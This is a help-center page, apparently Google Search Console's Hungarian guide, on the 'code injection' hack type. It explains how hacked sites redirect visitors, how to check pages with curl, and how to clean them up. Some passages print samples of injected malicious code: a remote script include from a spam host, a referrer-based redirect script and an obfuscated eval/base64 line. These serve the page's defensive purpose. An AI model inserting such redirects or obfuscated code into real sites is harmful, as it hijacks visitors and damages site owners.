Feltörés típusa: kódbeékelés

Mit jelent az, ha a Search Console-on a feltört oldal típusa „kódbeékelés”?

Ez azt jelenti, hogy egy hacker feltörte az Ön webhelyét, és a webhely látogatóit átirányítja a saját, spam jellegű webhelyére. Néha csak bizonyos felhasználókat irányít át a tartózkodási helyük, a hivatkozó webhely vagy a használt eszköz (például mobiltelefon) alapján. A hacker beékelheti a rosszindulatú kódot közvetlenül a webhely HTML-fájljaiba (például egy JavaScript-átirányításba) vagy a webhely tartalmát generáló fájlokba (például PHP-fájlokba). A látogatók átirányításának másik módja a szerver konfigurációs fájljainak módosítása. A szerverkonfigurációs fájlok általában lehetővé teszik a webhely rendszergazdájának, hogy URL-átirányításokat adjon meg a webhely bizonyos oldalainál vagy könyvtárainál. Apache szervereken ez például a .htaccess fájl és a httpd.conf. (Ha nem tudja, hogyan vizsgálja meg a szerver konfigurációs fájljait, olvassa el a Segítség feltört webhelyeknek eljárás 2. lépés: Állítson össze támogatási csapatot részét.)

A spammel megfertőzött webhelyekkel kapcsolatban további általános információt itt talál: 5. lépés: Mérje fel a kárt (spam).

Hogyan vizsgálhatom ki az átirányítást egy ilyen oldalon?

Először is, semmiképpen ne böngészőt használjon a webhelyén lévő feltört oldalak megtekintéséhez. Ez azért fontos, mert a hackerek gyakran úgy konfigurálják az oldalakat, hogy az átirányítás valamilyen felhasználói jellemző alapján történjen meg, például:

  • Tartózkodási hely, gyakran az IP-cím alapján kikövetkeztetve
  • Hivatkozó, például a keresési eredményoldal
  • User-agent, például mobiltelefon vagy kevésbé biztonságos böngésző

Ehelyett próbálja meg megerősíteni a viselkedést a következő módszerrel:

  • Use cURL or Wget to fetch a page:
    These freely available tools let you view the source of the page as seen by a search engine, and have the flexibility to include referrer or user-agent information. By serving spammy content only to users with specific user-agents or referrers, the hacker can target more "real people" and can better avoid detection from site owners and anti-hacking algorithms used by search engines. (Your site will need to be online to use these tools.) For example:
    $curl -v --referer "http://www.google.com/search?q=page" --user-agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html
  • Feltört szerverkonfigurációs fájllal rendelkező oldal lekérése a következő fejléceket adhatja vissza:

    ...
    < HTTP/1.1 301 Moved Permanently
    < Date: Sun, 24 Feb 2013 21:06:45 GMT
    < Server: Apache
    < Location: http://<spam-site>/index.html
    < Content-Length: 253
    …
    

    Vagy a visszakapott oldal tartalmának vizsgálatakor láthatja a beékelt kódot:

    • JavaScript vagy más szkriptnyelv, amely szkripteket hív meg és futtat egy spam webhelyről: <script type='text/javascript' src='http://spam-webhely/js/x55.js'></script>
    • Szkript, amely átirányítja a böngészőt egy spam webhelyre:
      
      <script>
      if (document.referrer.match(/google\.com/)) { window.location("http://spam-webhely/"); } </script>
    • Az észrevétel elkerülése miatt összezavart spam jellegű kód:
      eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

    Vizsgálja meg a webhelyen lévő összes lehetséges gyanús kódot. Érdemes lehet rákeresni olyan szavakra, mint a „script”, amelyek segítenek a JavaScript-kód megtalálásában. További hasznos kulcsszavak: „eval”, „unescape” stb.

    Hogyan tisztíthatom meg a webhelyemet a „kódbeékelés” típusú feltöréstől?

    Ha készen áll webhelye megtisztítására (a Segítség feltört webhelyeknek eljárás 7. lépése), akkor vagy lecserélheti az érintett fájlokat a legutolsó jó biztonsági mentésre, vagy eltávolíthatja a kódbeékelést az egyes oldalakról, valamint az összes kapcsolódó szkriptfüggvényből és -fájlból. Ha módosított szerverkonfigurációs fájlokat, akkor lehet, hogy újra kell indítania a webszervert a módosítások életbe léptetéséhez.

    Felhívjuk figyelmét, hogy bár a „kódbeékelés” típusú feltörés eltávolítása hasznos a feltört webhely helyreállítását tekintve, nem javítja ki a háttérben lévő sebezhetőséget, amelynek köszönhetően a hacker eredendően képes volt feltörni a webhelyet. A fő ok kijavítása nélkül webhelyét ismét feltörhetik a jövőben. Hasznos lehet például, ha frissíti a webhelyén futó szoftvereket, például egy régen telepített WordPress motort. A teljes webhely (nem csak a szóban forgó feltört típus) megtisztításával kapcsolatban további információt elsősorban a Segítség feltört webhelyeknek szerinti eljárás 5. lépés: Mérje fel a kárt (spam) lépésének „A fájlrendszer károsodásának felmérése” című részében talál.

    Hasznosnak találta?
    Hogyan fejleszthetnénk?